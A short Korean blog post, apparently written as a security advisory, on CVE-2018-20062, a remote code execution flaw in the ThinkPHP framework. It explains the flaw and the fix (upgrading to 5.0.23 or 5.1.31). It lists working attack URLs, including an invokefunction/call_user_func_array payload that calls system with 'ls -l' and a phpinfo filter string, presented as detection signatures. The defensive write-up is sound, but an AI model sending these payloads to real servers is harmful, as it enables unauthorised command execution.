취약점명
CVE-2018-20062 - Thinkphp framework pp.php controller REC
소개
Think PHP란?
ThinkPHP는 중국 탑씽크 기업에서 동적 웹 애플리케이션 개발을 위한 오픈 소스 PHP 개발 프레임 워크 입니다. 해당 프레임워크의 경우 중국이 개발하여 아시아권에서 많이 사용합니다.
취약점 소개
해당 취약점의 경우 원격 명령 실행을 할 수 있습니다. - url에서 컨트롤러 클래스명의 유효성이 검증되지 않아 강제 라우팅 옵션을 사용하지 않고 Getshell 실행하는 취약점이 있습니다. -URL에서 컨트롤러 클래스명의 유효성이 검증되지 않아 강제 라우팅 옵션을 사용하지 않고도 getshell이 실행된다.
Thinkphp /library/think/ App.php를 사용하면 원격 공격자가 s=index/\\think\\Request/input&filter=phpinfo&data =1 쿼리 문자열에 표시된 것처럼 필터 매개 변수를 조작하여 임의의 PHP 코드를 실행할 수 있습니다.
TMS 탐지 공격 코드
- /thinkphp/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array & vars[0]=system&vars[1][] =ls% 20-l
- /thinkphp/public/index.php?s=/index/\\think\\request/cache&key=ls%20-l | system
- /thinkphp/html/publick/index.php
- TP/index.php
해결 방법
- ThinkPHP 버전 5.0.23 또는 5.1.31 업데이트
- ’'문자열을 필터링하여 컨트롤러 클래스에 접근불가하도록 설정
'Security > CVE' 카테고리의 다른 글
Apache Log4Shell 분석 (0) | 2024.04.25 |
---|---|
CVE-2021-22205 분석 (0) | 2024.04.25 |
CVE-2020-14871 분석 (0) | 2024.04.25 |
CVE-2009-0545 분석 (0) | 2024.04.25 |
CVE-2021-32537 분석 (0) | 2024.04.25 |